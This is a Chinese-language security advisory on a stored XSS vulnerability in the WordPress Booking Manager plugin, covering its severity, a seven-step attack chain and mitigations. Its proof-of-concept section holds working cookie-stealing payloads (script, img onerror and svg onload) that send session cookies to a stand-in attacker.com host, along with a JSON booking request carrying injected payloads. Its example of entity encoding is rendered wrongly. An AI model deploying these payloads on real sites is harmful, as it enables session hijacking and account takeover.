CVE-2025-64275: WordPress Booking Manager插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-64275

漏洞类型

存储型XSS

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

WordPress Booking Manager (booking-manager)

漏洞概述

CVE-2025-64275是WordPress Booking Manager插件中的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞由于插件在处理用户输入时未对特殊字符进行充分过滤和转义，导致攻击者可以在预订系统中注入恶意JavaScript代码。这些恶意代码会被永久存储在数据库中，当其他用户访问相关页面时，恶意脚本会自动执行，从而窃取用户会话cookie、劫持用户账户或进行其他恶意操作。Booking Manager是WordPress平台上广泛使用的预订管理插件，用于处理酒店、民宿、活动等预订业务。由于该插件涉及敏感的用户数据和预订信息，存储型XSS漏洞的存在可能导致大量用户隐私信息泄露。攻击者利用此漏洞需要具备一定的账户权限（低权限即可），并需要诱导其他用户进行交互操作，如访问特定的预订页面或管理面板。该漏洞于2025年11月13日被Patchstack安全团队发现并披露，CVSS评分6.5，属于中等严重程度。

技术细节

存储型XSS漏洞的核心问题在于应用程序将用户输入的数据未经适当处理即存储到数据库中，并在后续页面渲染时直接输出给其他用户。在Booking Manager插件中，攻击者可以通过预订表单、评论、或其他用户可输入的字段提交包含恶意JavaScript代码的内容。由于插件未对这些输入进行HTML实体编码（如将<script>转换为<script>），恶意代码会被直接写入数据库。当管理员或其他用户查看相关预订记录或统计页面时，服务器从数据库取出数据并嵌入到HTML响应中，浏览器会将其作为合法脚本执行。攻击者常利用此漏洞窃取受害者的认证令牌（Cookies），进而冒充受害者进行操作。防御此类漏洞需要在数据输入时进行严格验证，在数据输出时进行HTML实体编码，并实施Content Security Policy（CSP）限制脚本执行来源。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网站使用的WordPress Booking Manager插件版本，确认版本在2.1.17或更低版本

STEP 2

步骤2: 账户创建/权限获取

攻击者注册普通用户账户或利用已有低权限账户，访问Booking Manager的预订功能

STEP 3

步骤3: 恶意Payload注入

攻击者在预订表单的客户名称、联系方式、备注等字段中注入包含恶意JavaScript代码的Payload

STEP 4

步骤4: 数据持久化

恶意代码随预订信息被存入数据库，由于插件未进行输入验证，Payload保持原样存储

STEP 5

步骤5: 等待受害者访问

管理员或其他用户访问预订管理页面、统计面板或相关前台页面时，触发存储的恶意脚本

STEP 6

步骤6: 会话劫持

恶意JavaScript执行后，窃取受害者的Cookies或会话令牌，并发送到攻击者控制的服务器

STEP 7

步骤7: 账户接管

攻击者利用窃取的会话信息冒充受害者进行操作，可能包括管理员权限升级或数据窃取

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<script> // Steal user cookies/session var stolenCookies = document.cookie; // Send stolen data to attacker-controlled server fetch('https://attacker.com/log?data=' + encodeURIComponent(stolenCookies), { method: 'GET', mode: 'no-cors' }); // Alternative payload for cookie theft new Image().src = 'https://attacker.com/steal?c=' + document.cookie; </script>  <img src=x onerror="fetch('https://attacker.com/log?data='+document.cookie)"> <svg/onload=fetch('https://attacker.com/steal?c='+document.cookie)>  { "booking_name": "<script>alert(document.domain)</script>", "booking_email": "[email protected]", "booking_message": "<img src=x onerror=fetch('https://attacker.com/log?d='+document.cookie)>", "booking_date": "2025-12-25" }

影响范围

booking-manager <= 2.1.17

WordPress Booking Manager from n/a through 2.1.17

防御指南

临时缓解措施

如果无法立即更新插件，可采取以下临时缓解措施：1) 限制Booking Manager插件的访问权限，仅允许受信任用户使用预订功能；2) 在Web应用防火墙（WAF）中添加XSS过滤规则，拦截包含<script>、<img>、<svg>等标签的请求；3) 禁用或限制前端用户提交自定义内容的字段；4) 监控日志中的异常请求模式；5) 考虑暂时禁用该插件直到官方补丁发布。同时建议检查现有数据库中是否已存在恶意代码并进行清理。